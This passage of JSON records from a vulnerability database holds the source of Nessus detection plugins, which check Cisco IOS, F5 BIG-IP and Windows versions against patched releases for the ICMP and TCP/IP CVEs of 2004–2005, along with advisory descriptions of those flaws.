Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\n# Affected: 12.2SXA and 12.2SXB\nif ((\"SXA\" >< version || \"SXB\" >< version) &&\n check_release(version: version,\n patched: make_list(\"12.2(17d)SXB7\") )) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\n# Affected: 12.2SXD\nif (\"SXD\" >< version &&\n check_release(version: version,\n patched: make_list(\"12.2(18)SXD4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)S7 or later\\n'); exit(0);\n}\n# Affected: 12.2T\nif (check_release(version: version,\n patched: make_list(\"12.2(15)T15\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XG\")) {\n security_warning(port:0, 
extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\n# Affected: 12.2YA\nif (check_release(version: version,\n patched: make_list(\"12.2(4)YA9\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif 
(deprecated_version(version, \"12.2YC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)S3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YO\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif 
(deprecated_version(version, \"12.2YU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YX\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2YX releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)S7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2ZH\nif (check_release(version: version,\n patched: make_list(\"12.2(13)ZH6\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif 
(deprecated_version(version, \"12.2ZJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2ZL\nif (check_release(version: version,\n patched: make_list(\"12.2(15)ZL2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZP\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2ZP releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3\nif (check_release(version: version,\n patched: make_list(\"12.3(3h)\", \"12.3(5e)\", \"12.3(6e)\", \"12.3(9d)\", \"12.3(10c)\", \"12.3(12b)\", \"12.3(13a)\", \"12.3(13)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3B\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3BC\nif (check_release(version: version,\n patched: make_list(\"12.3(9a)BC2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3BW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(7)T8 or later\\n'); exit(0);\n}\n# Affected: 12.3JA\nif (check_release(version: version,\n patched: make_list(\"12.3(4)JA\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3T\nif (check_release(version: version,\n patched: make_list(\"12.3(7)T8\", \"12.3(8)T7\", \"12.3(11)T4\", \"12.3(14)T\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XA\")) 
{\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XC\nif (check_release(version: version,\n patched: make_list(\"12.3(2)XC3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XG\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XG releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XI\nif (check_release(version: version,\n patched: make_list(\"12.3(7)XI3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XJ\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XJ releases. 
Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XS\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XU\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XU releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(11)YF2 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XY\nif (check_release(version: version,\n patched: make_list(\"12.3(8)XY4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YA\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YA releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YD\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YD releases. 
Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YF\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YF2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YG\nif (check_release(version: version,\n patched: make_list(\"12.3(8)YG1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YH\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YH releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YI\nif (check_release(version: version,\n patched: make_list(\"12.3(8)YI\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YJ\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YJ releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YK\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YK\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: TCPv6\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YK\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YN\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YN\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YQ\nif (check_release(version: version,\n patched: make_list(\"12.3(14)YQ\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n\nexit(0, \"The remote host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:37:08", "description": "The vulnerability described in this article was initially fixed 
in earlier versions, but a regression was reintroduced in BIG-IP 12.x through 13.x. For information about earlier versions, refer to K4583:\nInsufficient validation of ICMP error messages - VU#222750 / CVE-2004-0790 (9.x - 10.x).\n\nMultiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the 'blind connection-reset attack.' NOTE:\nCVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. (CVE-2004-0790)\n\nImpact\n\nA remote attacker can interfere with the Path MTU Discovery process and cause a performance degradation or reset of FastL4 accelerated TCP connections by spoofing a specifically crafted Internet Control Message Protocol (ICMP) message.\n\nThis vulnerability only applies to FastL4 virtual servers on BIG-IP platforms with the embedded Packet Velocity Acceleration (ePVA) chip. The ePVA chip is a hardware acceleration Field Programmable Gate Array (FPGA) that delivers high-performance Layer 4 (L4) IPv4 throughput. 
ePVA chips are included on the following BIG-IP platforms :\n\nB2100 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2150 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2250 Blade in the VIPRION C2400 or C2200 Chassis\n\nB4300 Blade in the VIPRION C4480 or C4800 Chassis\n\nB4340 Blade in the VIPRION C4480 or C4800 Chassis\n\nBIG-IP 12000 series\n\nBIG-IP 10000 series\n\nBIG-IP 7000 series\n\nBIG-IP 5000 series\n\nBIG-IP i5000 series\n\nBIG-IP i7000 series\n\nBIG-IP i10000 series", "cvss3": {"score": null, "vector": null}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Insufficient validation of ICMP error messages (K23440942)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2019-05-09T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL23440942.NASL", "href": "https://www.tenable.com/plugins/nessus/100000", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K23440942.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100000);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/05/09 9:52:02\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-0065\", \"CVE-2005-0066\", \"CVE-2005-0067\", \"CVE-2005-0068\");\n script_bugtraq_id(13124);\n\n script_name(english:\"F5 Networks BIG-IP : 
Insufficient validation of ICMP error messages (K23440942)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The vulnerability described in this article was initially fixed in\nearlier versions, but a regression was reintroduced in BIG-IP 12.x\nthrough 13.x. For information about earlier versions, refer to K4583:\nInsufficient validation of ICMP error messages - VU#222750 /\nCVE-2004-0790 (9.x - 10.x).\n\nMultiple TCP/IP and ICMP implementations allow remote attackers to\ncause a denial of service (reset TCP connections) via spoofed ICMP\nerror messages, aka the 'blind connection-reset attack.' NOTE:\nCVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based\non different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and\nCVE-2005-0068 are related identifiers that are SPLIT based on the\nunderlying vulnerability. While CVE normally SPLITs based on\nvulnerability, the attack-based identifiers exist due to the variety\nand number of affected implementations and solutions that address the\nattacks instead of the underlying vulnerabilities. (CVE-2004-0790)\n\nImpact\n\nA remote attacker can interfere with the Path MTU Discovery process\nand cause a performance degradation or reset of FastL4 accelerated TCP\nconnections by spoofing a specifically crafted Internet Control Message\nProtocol (ICMP) message.\n\nThis vulnerability only applies to FastL4 virtual servers on BIG-IP\nplatforms with the embedded Packet Velocity Acceleration (ePVA)\nchip. The ePVA chip is a hardware acceleration Field Programmable Gate\nArray (FPGA) that delivers high-performance Layer 4 (L4) IPv4\nthroughput. 
ePVA chips are included on the following BIG-IP \nplatforms :\n\nB2100 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2150 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2250 Blade in the VIPRION C2400 or C2200 Chassis\n\nB4300 Blade in the VIPRION C4480 or C4800 Chassis\n\nB4340 Blade in the VIPRION C4480 or C4800 Chassis\n\nBIG-IP 12000 series\n\nBIG-IP 10000 series\n\nBIG-IP 7000 series\n\nBIG-IP 5000 series\n\nBIG-IP i5000 series\n\nBIG-IP i7000 series\n\nBIG-IP i10000 series\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K23440942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K4583\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K23440942.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K23440942\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, 
extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:17:28", "description": "The remote host runs a version of Windows that has a flaw in its TCP/IP stack.\n\nThe flaw could allow an attacker to execute arbitrary code with SYSTEM privileges on the remote host, or to perform a denial of service attack against the remote host.\n\nProof of concept code is available to perform a Denial of Service against a vulnerable system.", "cvss3": {"score": null, "vector": null}, "published": "2005-04-12T00:00:00", "type": "nessus", "title": "MS05-019: Vulnerabilities in TCP/IP Could Allow Remote Code Execution (893066)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0230", "CVE-2004-0790", "CVE-2004-1060", "CVE-2005-0048", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068", "CVE-2005-0688"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS05-019.NASL", "href": "https://www.tenable.com/plugins/nessus/18023", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18023);\n script_version(\"1.43\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2004-0230\",\n \"CVE-2004-0790\",\n \"CVE-2004-1060\",\n \"CVE-2005-0048\",\n \"CVE-2005-0065\",\n \"CVE-2005-0066\",\n \"CVE-2005-0067\",\n \"CVE-2005-0068\",\n \"CVE-2005-0688\"\n );\n script_bugtraq_id(13116, 13124, 13658);\n script_xref(name:\"MSFT\", value:\"MS05-019\");\n script_xref(name:\"CERT\", value:\"222750\");\n script_xref(name:\"CERT\", value:\"233754\");\n script_xref(name:\"CERT\", value:\"396645\");\n 
